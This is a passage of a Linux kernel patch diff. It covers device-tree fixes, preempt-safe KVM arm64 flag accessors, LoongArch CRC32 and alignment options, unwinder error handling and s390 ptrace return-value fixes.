++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -135,7 +135,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio3 5 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+index cefabe65b2520..c8b521d45fca1 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin-dev.dtsi
+@@ -12,7 +12,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio_expander_21 4 GPIO_ACTIVE_HIGH>; /* ETH_PWR_EN */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		regulator-max-microvolt = <3300000>;
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-name = "+V3.3_ETH";
+diff --git a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+index 6a1890a4b5d88..947e4537303f2 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mp-verdin.dtsi
+@@ -87,7 +87,7 @@
+ 		compatible = "regulator-fixed";
+ 		enable-active-high;
+ 		gpio = <&gpio2 20 GPIO_ACTIVE_HIGH>; /* PMIC_EN_ETH */
+-		off-on-delay = <500000>;
++		off-on-delay-us = <500000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_reg_eth>;
+ 		regulator-always-on;
+@@ -128,7 +128,7 @@
+ 		enable-active-high;
+ 		/* Verdin SD_1_PWR_EN (SODIMM 76) */
+ 		gpio = <&gpio4 22 GPIO_ACTIVE_HIGH>;
+-		off-on-delay = <100000>;
++		off-on-delay-us = <100000>;
+ 		pinctrl-names = "default";
+ 		pinctrl-0 = <&pinctrl_usdhc2_pwr_en>;
+ 		regulator-max-microvolt = <3300000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+index ca3f96646b90d..5cf07caf41033 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk01.dts
+@@ -62,11 +62,11 @@
+ 	perst-gpios = <&tlmm 58 GPIO_ACTIVE_LOW>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+index 651a231554e0b..1b8379ba87f9c 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074-hk10.dtsi
+@@ -48,11 +48,11 @@
+ 	perst-gpios = <&tlmm 61 GPIO_ACTIVE_LOW>;
+ };
+ 
+-&pcie_phy0 {
++&pcie_qmp0 {
+ 	status = "okay";
+ };
+ 
+-&pcie_phy1 {
++&pcie_qmp1 {
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+index f2c0b71b5d8e8..896a6925bbc32 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-pmics.dtsi
+@@ -59,8 +59,9 @@
+ 		#size-cells = <0>;
+ 
+ 		pmk8280_pon: pon@1300 {
+-			compatible = "qcom,pm8998-pon";
+-			reg = <0x1300>;
++			compatible = "qcom,pmk8350-pon";
++			reg = <0x1300>, <0x800>;
++			reg-names = "hlos", "pbs";
+ 
+ 			pmk8280_pon_pwrkey: pwrkey {
+ 				compatible = "qcom,pmk8350-pwrkey";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+index ce7165d7f1a14..102e448bc026a 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3566-soquartz.dtsi
+@@ -598,7 +598,7 @@
+ 	non-removable;
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&sdmmc1_bus4 &sdmmc1_cmd &sdmmc1_clk>;
+-	sd-uhs-sdr104;
++	sd-uhs-sdr50;
+ 	vmmc-supply = <&vcc3v3_sys>;
+ 	vqmmc-supply = <&vcc_1v8>;
+ 	status = "okay";
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index 35a159d131b5f..307a840b78865 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -533,9 +533,22 @@ struct kvm_vcpu_arch {
+ 	({							\
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+-		v->arch.flagset & (m);				\
++		READ_ONCE(v->arch.flagset) & (m);		\
+ 	})
+ 
++/*
++ * Note that the set/clear accessors must be preempt-safe in order to
++ * avoid nesting them with load/put which also manipulate flags...
++ */
++#ifdef __KVM_NVHE_HYPERVISOR__
++/* the nVHE hypervisor is always non-preemptible */
++#define __vcpu_flags_preempt_disable()
++#define __vcpu_flags_preempt_enable()
++#else
++#define __vcpu_flags_preempt_disable()	preempt_disable()
++#define __vcpu_flags_preempt_enable()	preempt_enable()
++#endif
++
+ #define __vcpu_set_flag(v, flagset, f, m)			\
+ 	do {							\
+ 		typeof(v->arch.flagset) *fset;			\
+@@ -543,9 +556,11 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		if (HWEIGHT(m) > 1)				\
+ 			*fset &= ~(m);				\
+ 		*fset |= (f);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define __vcpu_clear_flag(v, flagset, f, m)			\
+@@ -555,7 +570,9 @@ struct kvm_vcpu_arch {
+ 		__build_check_flag(v, flagset, f, m);		\
+ 								\
+ 		fset = &v->arch.flagset;			\
++		__vcpu_flags_preempt_disable();			\
+ 		*fset &= ~(m);					\
++		__vcpu_flags_preempt_enable();			\
+ 	} while (0)
+ 
+ #define vcpu_get_flag(v, ...)	__vcpu_get_flag((v), __VA_ARGS__)
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index c9f401fa01a93..950e35b993d2b 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -397,6 +397,8 @@ int kvm_arm_set_fw_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	u64 val;
+ 	int wa_level;
+ 
++	if (KVM_REG_SIZE(reg->id) != sizeof(val))
++		return -ENOENT;
+ 	if (copy_from_user(&val, uaddr, KVM_REG_SIZE(reg->id)))
+ 		return -EFAULT;
+ 
+diff --git a/arch/loongarch/Kconfig b/arch/loongarch/Kconfig
+index 9cc8b84f7eb03..e349cc9e3c228 100644
+--- a/arch/loongarch/Kconfig
++++ b/arch/loongarch/Kconfig
+@@ -94,6 +94,7 @@ config LOONGARCH
+ 	select HAVE_DYNAMIC_FTRACE_WITH_ARGS
+ 	select HAVE_DYNAMIC_FTRACE_WITH_REGS
+ 	select HAVE_EBPF_JIT
++	select HAVE_EFFICIENT_UNALIGNED_ACCESS if !ARCH_STRICT_ALIGN
+ 	select HAVE_EXIT_THREAD
+ 	select HAVE_FAST_GUP
+ 	select HAVE_FTRACE_MCOUNT_RECORD
+@@ -441,6 +442,40 @@ config ARCH_IOREMAP
+ 	  protection support. However, you can enable LoongArch DMW-based
+ 	  ioremap() for better performance.
+ 
++config ARCH_WRITECOMBINE
++	bool "Enable WriteCombine (WUC) for ioremap()"
++	help
++	  LoongArch maintains cache coherency in hardware, but when paired
++	  with LS7A chipsets the WUC attribute (Weak-ordered UnCached, which
++	  is similar to WriteCombine) is out of the scope of cache coherency
++	  machanism for PCIe devices (this is a PCIe protocol violation, which
++	  may be fixed in newer chipsets).
++
++	  This means WUC can only used for write-only memory regions now, so
++	  this option is disabled by default, making WUC silently fallback to
++	  SUC for ioremap(). You can enable this option if the kernel is ensured
++	  to run on hardware without this bug.
++
++	  You can override this setting via writecombine=on/off boot parameter.
++
++config ARCH_STRICT_ALIGN
++	bool "Enable -mstrict-align to prevent unaligned accesses" if EXPERT
++	default y
++	help
++	  Not all LoongArch cores support h/w unaligned access, we can use
++	  -mstrict-align build parameter to prevent unaligned accesses.
++
++	  CPUs with h/w unaligned access support:
++	  Loongson-2K2000/2K3000/3A5000/3C5000/3D5000.
++
++	  CPUs without h/w unaligned access support:
++	  Loongson-2K500/2K1000.
++
++	  This option is enabled by default to make the kernel be able to run
++	  on all LoongArch systems. But you can disable it manually if you want
++	  to run kernel only on systems with h/w unaligned access support in
++	  order to optimise for performance.
++
+ config KEXEC
+ 	bool "Kexec system call"
+ 	select KEXEC_CORE
+diff --git a/arch/loongarch/Makefile b/arch/loongarch/Makefile
+index 4402387d27551..6e1c931a8507e 100644
+--- a/arch/loongarch/Makefile
++++ b/arch/loongarch/Makefile
+@@ -91,10 +91,15 @@ KBUILD_CPPFLAGS += -DVMLINUX_LOAD_ADDRESS=$(load-y)
+ # instead of .eh_frame so we don't discard them.
+ KBUILD_CFLAGS += -fno-asynchronous-unwind-tables
+ 
++ifdef CONFIG_ARCH_STRICT_ALIGN
+ # Don't emit unaligned accesses.
+ # Not all LoongArch cores support unaligned access, and as kernel we can't
+ # rely on others to provide emulation for these accesses.
+ KBUILD_CFLAGS += $(call cc-option,-mstrict-align)
++else
++# Optimise for performance on hardware supports unaligned access.
++KBUILD_CFLAGS += $(call cc-option,-mno-strict-align)
++endif
+ 
+ KBUILD_CFLAGS += -isystem $(shell $(CC) -print-file-name=include)
+ 
+diff --git a/arch/loongarch/include/asm/acpi.h b/arch/loongarch/include/asm/acpi.h
+index 4198753aa1d0f..976a810352c60 100644
+--- a/arch/loongarch/include/asm/acpi.h
++++ b/arch/loongarch/include/asm/acpi.h
+@@ -41,8 +41,11 @@ extern void loongarch_suspend_enter(void);
+ 
+ static inline unsigned long acpi_get_wakeup_address(void)
+ {
++#ifdef CONFIG_SUSPEND
+ 	extern void loongarch_wakeup_start(void);
+ 	return (unsigned long)loongarch_wakeup_start;
++#endif
++	return 0UL;
+ }
+ 
+ #endif /* _ASM_LOONGARCH_ACPI_H */
+diff --git a/arch/loongarch/include/asm/cpu-features.h b/arch/loongarch/include/asm/cpu-features.h
+index b07974218393d..f6177f1334776 100644
+--- a/arch/loongarch/include/asm/cpu-features.h
++++ b/arch/loongarch/include/asm/cpu-features.h
+@@ -42,6 +42,7 @@
+ #define cpu_has_fpu		cpu_opt(LOONGARCH_CPU_FPU)
+ #define cpu_has_lsx		cpu_opt(LOONGARCH_CPU_LSX)
+ #define cpu_has_lasx		cpu_opt(LOONGARCH_CPU_LASX)
++#define cpu_has_crc32		cpu_opt(LOONGARCH_CPU_CRC32)
+ #define cpu_has_complex		cpu_opt(LOONGARCH_CPU_COMPLEX)
+ #define cpu_has_crypto		cpu_opt(LOONGARCH_CPU_CRYPTO)
+ #define cpu_has_lvz		cpu_opt(LOONGARCH_CPU_LVZ)
+diff --git a/arch/loongarch/include/asm/cpu.h b/arch/loongarch/include/asm/cpu.h
+index 754f285067913..9275770552636 100644
+--- a/arch/loongarch/include/asm/cpu.h
++++ b/arch/loongarch/include/asm/cpu.h
+@@ -78,25 +78,26 @@ enum cpu_type_enum {
+ #define CPU_FEATURE_FPU			3	/* CPU has FPU */
+ #define CPU_FEATURE_LSX			4	/* CPU has LSX (128-bit SIMD) */
+ #define CPU_FEATURE_LASX		5	/* CPU has LASX (256-bit SIMD) */
+-#define CPU_FEATURE_COMPLEX		6	/* CPU has Complex instructions */
+-#define CPU_FEATURE_CRYPTO		7	/* CPU has Crypto instructions */
+-#define CPU_FEATURE_LVZ			8	/* CPU has Virtualization extension */
+-#define CPU_FEATURE_LBT_X86		9	/* CPU has X86 Binary Translation */
+-#define CPU_FEATURE_LBT_ARM		10	/* CPU has ARM Binary Translation */
+-#define CPU_FEATURE_LBT_MIPS		11	/* CPU has MIPS Binary Translation */
+-#define CPU_FEATURE_TLB			12	/* CPU has TLB */
+-#define CPU_FEATURE_CSR			13	/* CPU has CSR */
+-#define CPU_FEATURE_WATCH		14	/* CPU has watchpoint registers */
+-#define CPU_FEATURE_VINT		15	/* CPU has vectored interrupts */
+-#define CPU_FEATURE_CSRIPI		16	/* CPU has CSR-IPI */
+-#define CPU_FEATURE_EXTIOI		17	/* CPU has EXT-IOI */
+-#define CPU_FEATURE_PREFETCH		18	/* CPU has prefetch instructions */
+-#define CPU_FEATURE_PMP			19	/* CPU has perfermance counter */
+-#define CPU_FEATURE_SCALEFREQ		20	/* CPU supports cpufreq scaling */
+-#define CPU_FEATURE_FLATMODE		21	/* CPU has flat mode */
+-#define CPU_FEATURE_EIODECODE		22	/* CPU has EXTIOI interrupt pin decode mode */
+-#define CPU_FEATURE_GUESTID		23	/* CPU has GuestID feature */
+-#define CPU_FEATURE_HYPERVISOR		24	/* CPU has hypervisor (running in VM) */
++#define CPU_FEATURE_CRC32		6	/* CPU has CRC32 instructions */
++#define CPU_FEATURE_COMPLEX		7	/* CPU has Complex instructions */
++#define CPU_FEATURE_CRYPTO		8	/* CPU has Crypto instructions */
++#define CPU_FEATURE_LVZ			9	/* CPU has Virtualization extension */
++#define CPU_FEATURE_LBT_X86		10	/* CPU has X86 Binary Translation */
++#define CPU_FEATURE_LBT_ARM		11	/* CPU has ARM Binary Translation */
++#define CPU_FEATURE_LBT_MIPS		12	/* CPU has MIPS Binary Translation */
++#define CPU_FEATURE_TLB			13	/* CPU has TLB */
++#define CPU_FEATURE_CSR			14	/* CPU has CSR */
++#define CPU_FEATURE_WATCH		15	/* CPU has watchpoint registers */
++#define CPU_FEATURE_VINT		16	/* CPU has vectored interrupts */
++#define CPU_FEATURE_CSRIPI		17	/* CPU has CSR-IPI */
++#define CPU_FEATURE_EXTIOI		18	/* CPU has EXT-IOI */
++#define CPU_FEATURE_PREFETCH		19	/* CPU has prefetch instructions */
++#define CPU_FEATURE_PMP			20	/* CPU has perfermance counter */
++#define CPU_FEATURE_SCALEFREQ		21	/* CPU supports cpufreq scaling */
++#define CPU_FEATURE_FLATMODE		22	/* CPU has flat mode */
++#define CPU_FEATURE_EIODECODE		23	/* CPU has EXTIOI interrupt pin decode mode */
++#define CPU_FEATURE_GUESTID		24	/* CPU has GuestID feature */
++#define CPU_FEATURE_HYPERVISOR		25	/* CPU has hypervisor (running in VM) */
+ 
+ #define LOONGARCH_CPU_CPUCFG		BIT_ULL(CPU_FEATURE_CPUCFG)
+ #define LOONGARCH_CPU_LAM		BIT_ULL(CPU_FEATURE_LAM)
+@@ -104,6 +105,7 @@ enum cpu_type_enum {
+ #define LOONGARCH_CPU_FPU		BIT_ULL(CPU_FEATURE_FPU)
+ #define LOONGARCH_CPU_LSX		BIT_ULL(CPU_FEATURE_LSX)
+ #define LOONGARCH_CPU_LASX		BIT_ULL(CPU_FEATURE_LASX)
++#define LOONGARCH_CPU_CRC32		BIT_ULL(CPU_FEATURE_CRC32)
+ #define LOONGARCH_CPU_COMPLEX		BIT_ULL(CPU_FEATURE_COMPLEX)
+ #define LOONGARCH_CPU_CRYPTO		BIT_ULL(CPU_FEATURE_CRYPTO)
+ #define LOONGARCH_CPU_LVZ		BIT_ULL(CPU_FEATURE_LVZ)
+diff --git a/arch/loongarch/include/asm/io.h b/arch/loongarch/include/asm/io.h
+index 402a7d9e3a53e..545e2708fbf70 100644
+--- a/arch/loongarch/include/asm/io.h
++++ b/arch/loongarch/include/asm/io.h
+@@ -54,8 +54,10 @@ static inline void __iomem *ioremap_prot(phys_addr_t offset, unsigned long size,
+  * @offset:    bus address of the memory
+  * @size:      size of the resource to map
+  */
++extern pgprot_t pgprot_wc;
++
+ #define ioremap_wc(offset, size)	\
+-	ioremap_prot((offset), (size), pgprot_val(PAGE_KERNEL_WUC))
++	ioremap_prot((offset), (size), pgprot_val(pgprot_wc))
+ 
+ #define ioremap_cache(offset, size)	\
+ 	ioremap_prot((offset), (size), pgprot_val(PAGE_KERNEL))
+diff --git a/arch/loongarch/include/asm/loongarch.h b/arch/loongarch/include/asm/loongarch.h
+index 7f8d57a61c8bd..62835d84a647d 100644
+--- a/arch/loongarch/include/asm/loongarch.h
++++ b/arch/loongarch/include/asm/loongarch.h
+@@ -117,7 +117,7 @@ static inline u32 read_cpucfg(u32 reg)
+ #define  CPUCFG1_EP			BIT(22)
+ #define  CPUCFG1_RPLV			BIT(23)
+ #define  CPUCFG1_HUGEPG			BIT(24)
+-#define  CPUCFG1_IOCSRBRD		BIT(25)
++#define  CPUCFG1_CRC32			BIT(25)
+ #define  CPUCFG1_MSGINT			BIT(26)
+ 
+ #define LOONGARCH_CPUCFG2		0x2
+diff --git a/arch/loongarch/include/asm/module.lds.h b/arch/loongarch/include/asm/module.lds.h
+index 438f09d4ccf41..88554f92e0103 100644
+--- a/arch/loongarch/include/asm/module.lds.h
++++ b/arch/loongarch/include/asm/module.lds.h
+@@ -2,8 +2,8 @@
+ /* Copyright (C) 2020-2022 Loongson Technology Corporation Limited */
+ SECTIONS {
+ 	. = ALIGN(4);
+-	.got : { BYTE(0) }
+-	.plt : { BYTE(0) }
+-	.plt.idx : { BYTE(0) }
+-	.ftrace_trampoline : { BYTE(0) }
++	.got 0 : { BYTE(0) }
++	.plt 0 : { BYTE(0) }
++	.plt.idx 0 : { BYTE(0) }
++	.ftrace_trampoline 0 : { BYTE(0) }
+ }
+diff --git a/arch/loongarch/kernel/Makefile b/arch/loongarch/kernel/Makefile
+index c8cfbd562921d..df5dbabfe7a6c 100644
+--- a/arch/loongarch/kernel/Makefile
++++ b/arch/loongarch/kernel/Makefile
+@@ -8,13 +8,15 @@ extra-y		:= vmlinux.lds
+ obj-y		+= head.o cpu-probe.o cacheinfo.o env.o setup.o entry.o genex.o \
+ 		   traps.o irq.o idle.o process.o dma.o mem.o io.o reset.o switch.o \
+ 		   elf.o syscall.o signal.o time.o topology.o inst.o ptrace.o vdso.o \
+-		   alternative.o unaligned.o unwind.o
++		   alternative.o unwind.o
+ 
+ obj-$(CONFIG_ACPI)		+= acpi.o
+ obj-$(CONFIG_EFI) 		+= efi.o
+ 
+ obj-$(CONFIG_CPU_HAS_FPU)	+= fpu.o
+ 
++obj-$(CONFIG_ARCH_STRICT_ALIGN)	+= unaligned.o
++
+ ifdef CONFIG_FUNCTION_TRACER
+   ifndef CONFIG_DYNAMIC_FTRACE
+     obj-y += mcount.o ftrace.o
+diff --git a/arch/loongarch/kernel/cpu-probe.c b/arch/loongarch/kernel/cpu-probe.c
+index 3a3fce2d78461..5adf0f736c6d7 100644
+--- a/arch/loongarch/kernel/cpu-probe.c
++++ b/arch/loongarch/kernel/cpu-probe.c
+@@ -60,7 +60,7 @@ static inline void set_elf_platform(int cpu, const char *plat)
+ 
+ /* MAP BASE */
+ unsigned long vm_map_base;
+-EXPORT_SYMBOL_GPL(vm_map_base);
++EXPORT_SYMBOL(vm_map_base);
+ 
+ static void cpu_probe_addrbits(struct cpuinfo_loongarch *c)
+ {
+@@ -94,13 +94,18 @@ static void cpu_probe_common(struct cpuinfo_loongarch *c)
+ 	c->options = LOONGARCH_CPU_CPUCFG | LOONGARCH_CPU_CSR |
+ 		     LOONGARCH_CPU_TLB | LOONGARCH_CPU_VINT | LOONGARCH_CPU_WATCH;
+ 
+-	elf_hwcap = HWCAP_LOONGARCH_CPUCFG | HWCAP_LOONGARCH_CRC32;
++	elf_hwcap = HWCAP_LOONGARCH_CPUCFG;
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG1);
+ 	if (config & CPUCFG1_UAL) {
+ 		c->options |= LOONGARCH_CPU_UAL;
+ 		elf_hwcap |= HWCAP_LOONGARCH_UAL;
+ 	}
++	if (config & CPUCFG1_CRC32) {
++		c->options |= LOONGARCH_CPU_CRC32;
++		elf_hwcap |= HWCAP_LOONGARCH_CRC32;
++	}
++
+ 
+ 	config = read_cpucfg(LOONGARCH_CPUCFG2);
+ 	if (config & CPUCFG2_LAM) {
+diff --git a/arch/loongarch/kernel/proc.c b/arch/loongarch/kernel/proc.c
+index 5c67cc4fd56d5..0d82907b5404c 100644
+--- a/arch/loongarch/kernel/proc.c
++++ b/arch/loongarch/kernel/proc.c
+@@ -76,6 +76,7 @@ static int show_cpuinfo(struct seq_file *m, void *v)
+ 	if (cpu_has_fpu)	seq_printf(m, " fpu");
+ 	if (cpu_has_lsx)	seq_printf(m, " lsx");
+ 	if (cpu_has_lasx)	seq_printf(m, " lasx");
++	if (cpu_has_crc32)	seq_printf(m, " crc32");
+ 	if (cpu_has_complex)	seq_printf(m, " complex");
+ 	if (cpu_has_crypto)	seq_printf(m, " crypto");
+ 	if (cpu_has_lvz)	seq_printf(m, " lvz");
+diff --git a/arch/loongarch/kernel/setup.c b/arch/loongarch/kernel/setup.c
+index 4344502c0b317..7ac1aecc76870 100644
+--- a/arch/loongarch/kernel/setup.c
++++ b/arch/loongarch/kernel/setup.c
+@@ -160,6 +160,27 @@ static void __init smbios_parse(void)
+ 	dmi_walk(find_tokens, NULL);
+ }
+ 
++#ifdef CONFIG_ARCH_WRITECOMBINE
++pgprot_t pgprot_wc = PAGE_KERNEL_WUC;
++#else
++pgprot_t pgprot_wc = PAGE_KERNEL_SUC;
++#endif
++
++EXPORT_SYMBOL(pgprot_wc);
++
++static int __init setup_writecombine(char *p)
++{
++	if (!strcmp(p, "on"))
++		pgprot_wc = PAGE_KERNEL_WUC;
++	else if (!strcmp(p, "off"))
++		pgprot_wc = PAGE_KERNEL_SUC;
++	else
++		pr_warn("Unknown writecombine setting \"%s\".\n", p);
++
++	return 0;
++}
++early_param("writecombine", setup_writecombine);
++
+ static int usermem __initdata;
+ 
+ static int __init early_parse_mem(char *p)
+diff --git a/arch/loongarch/kernel/stacktrace.c b/arch/loongarch/kernel/stacktrace.c
+index 3a690f96f00c1..2463d2fea21f5 100644
+--- a/arch/loongarch/kernel/stacktrace.c
++++ b/arch/loongarch/kernel/stacktrace.c
+@@ -30,7 +30,7 @@ void arch_stack_walk(stack_trace_consume_fn consume_entry, void *cookie,
+ 
+ 	regs->regs[1] = 0;
+ 	for (unwind_start(&state, task, regs);
+-	      !unwind_done(&state); unwind_next_frame(&state)) {
++	     !unwind_done(&state) && !unwind_error(&state); unwind_next_frame(&state)) {
+ 		addr = unwind_get_return_address(&state);
+ 		if (!addr || !consume_entry(cookie, addr))
+ 			break;
+diff --git a/arch/loongarch/kernel/traps.c b/arch/loongarch/kernel/traps.c
+index c38a146a973b4..05511203732c3 100644
+--- a/arch/loongarch/kernel/traps.c
++++ b/arch/loongarch/kernel/traps.c
+@@ -371,9 +371,14 @@ int no_unaligned_warning __read_mostly = 1;	/* Only 1 warning by default */
+ 
+ asmlinkage void noinstr do_ale(struct pt_regs *regs)
+ {
+-	unsigned int *pc;
+ 	irqentry_state_t state = irqentry_enter(regs);
+ 
++#ifndef CONFIG_ARCH_STRICT_ALIGN
++	die_if_kernel("Kernel ale access", regs);
++	force_sig_fault(SIGBUS, BUS_ADRALN, (void __user *)regs->csr_badvaddr);
++#else
++	unsigned int *pc;
++
+ 	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, regs->csr_badvaddr);
+ 
+ 	/*
+@@ -397,8 +402,8 @@ asmlinkage void noinstr do_ale(struct pt_regs *regs)
+ sigbus:
+ 	die_if_kernel("Kernel ale access", regs);
+ 	force_sig_fault(SIGBUS, BUS_ADRALN, (void __user *)regs->csr_badvaddr);
+-
+ out:
++#endif
+ 	irqentry_exit(regs, state);
+ }
+ 
+diff --git a/arch/loongarch/kernel/unwind.c b/arch/loongarch/kernel/unwind.c
+index a463d6961344c..ba324ba76fa15 100644
+--- a/arch/loongarch/kernel/unwind.c
++++ b/arch/loongarch/kernel/unwind.c
+@@ -28,5 +28,6 @@ bool default_next_frame(struct unwind_state *state)
+ 
+ 	} while (!get_stack_info(state->sp, state->task, info));
+ 
++	state->error = true;
+ 	return false;
+ }
+diff --git a/arch/loongarch/kernel/unwind_prologue.c b/arch/loongarch/kernel/unwind_prologue.c
+index 9095fde8e55d5..55afc27320e12 100644
+--- a/arch/loongarch/kernel/unwind_prologue.c
++++ b/arch/loongarch/kernel/unwind_prologue.c
+@@ -211,7 +211,7 @@ static bool next_frame(struct unwind_state *state)
+ 			pc = regs->csr_era;
+ 
+ 			if (user_mode(regs) || !__kernel_text_address(pc))
+-				return false;
++				goto out;
+ 
+ 			state->first = true;
+ 			state->pc = pc;
+@@ -226,6 +226,8 @@ static bool next_frame(struct unwind_state *state)
+ 
+ 	} while (!get_stack_info(state->sp, state->task, info));
+ 
++out:
++	state->error = true;
+ 	return false;
+ }
+ 
+diff --git a/arch/loongarch/mm/init.c b/arch/loongarch/mm/init.c
+index e018aed345866..3b7d8129570b8 100644
+--- a/arch/loongarch/mm/init.c
++++ b/arch/loongarch/mm/init.c
+@@ -41,7 +41,7 @@
+  * don't have to care about aliases on other CPUs.
+  */
+ unsigned long empty_zero_page, zero_page_mask;
+-EXPORT_SYMBOL_GPL(empty_zero_page);
++EXPORT_SYMBOL(empty_zero_page);
+ EXPORT_SYMBOL(zero_page_mask);
+ 
+ void setup_zero_pages(void)
+@@ -270,7 +270,7 @@ pud_t invalid_pud_table[PTRS_PER_PUD] __page_aligned_bss;
+ #endif
+ #ifndef __PAGETABLE_PMD_FOLDED
+ pmd_t invalid_pmd_table[PTRS_PER_PMD] __page_aligned_bss;
+-EXPORT_SYMBOL_GPL(invalid_pmd_table);
++EXPORT_SYMBOL(invalid_pmd_table);
+ #endif
+ pte_t invalid_pte_table[PTRS_PER_PTE] __page_aligned_bss;
+ EXPORT_SYMBOL(invalid_pte_table);
+diff --git a/arch/mips/kernel/vmlinux.lds.S b/arch/mips/kernel/vmlinux.lds.S
+index 1f98947fe715d..91d6a5360bb9c 100644
+--- a/arch/mips/kernel/vmlinux.lds.S
++++ b/arch/mips/kernel/vmlinux.lds.S
+@@ -15,6 +15,8 @@
+ #define EMITS_PT_NOTE
+ #endif
+ 
++#define RUNTIME_DISCARD_EXIT
++
+ #include <asm-generic/vmlinux.lds.h>
+ 
+ #undef mips
+diff --git a/arch/riscv/purgatory/Makefile b/arch/riscv/purgatory/Makefile
+index dd58e1d993972..659e21862077b 100644
+--- a/arch/riscv/purgatory/Makefile
++++ b/arch/riscv/purgatory/Makefile
+@@ -74,9 +74,7 @@ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_ctype.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_ctype.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_entry.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memcpy.o		+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_memset.o		+= -Wa,-gdwarf-2
++asflags-remove-y		+= $(foreach x, -g -gdwarf-4 -gdwarf-5, $(x) -Wa,$(x))
+ 
+ $(obj)/purgatory.ro: $(PURGATORY_OBJS) FORCE
+ 		$(call if_changed,ld)
+diff --git a/arch/s390/kernel/ptrace.c b/arch/s390/kernel/ptrace.c
+index 53e0209229f87..092b16b4dd4f6 100644
+--- a/arch/s390/kernel/ptrace.c
++++ b/arch/s390/kernel/ptrace.c
+@@ -474,9 +474,7 @@ long arch_ptrace(struct task_struct *child, long request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned long __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned long __user *)data);
+ 	case PTRACE_ENABLE_TE:
+ 		if (!MACHINE_HAS_TE)
+ 			return -EIO;
+@@ -824,9 +822,7 @@ long compat_arch_ptrace(struct task_struct *child, compat_long_t request,
+ 		}
+ 		return 0;
+ 	case PTRACE_GET_LAST_BREAK:
+-		put_user(child->thread.last_break,
+-			 (unsigned int __user *) data);
+-		return 0;
++		return put_user(child->thread.last_break, (unsigned int __user *)data);
+ 	}
+ 	return compat_ptrace_request(child, request, addr, data);
+ }
+diff --git a/arch/x86/purgatory/Makefile b/arch/x86/purgatory/Makefile
+index 17f09dc263811..82fec66d46d29 100644
+--- a/arch/x86/purgatory/Makefile
++++ b/arch/x86/purgatory/Makefile
+@@ -69,8 +69,7 @@ CFLAGS_sha256.o			+= $(PURGATORY_CFLAGS)
+ CFLAGS_REMOVE_string.o		+= $(PURGATORY_CFLAGS_REMOVE)
+ CFLAGS_string.o			+= $(PURGATORY_CFLAGS)
+ 
+-AFLAGS_REMOVE_setup-x86_$(BITS).o	+= -Wa,-gdwarf-2
+-AFLAGS_REMOVE_entry64.o			+= -Wa,-gdwarf-2
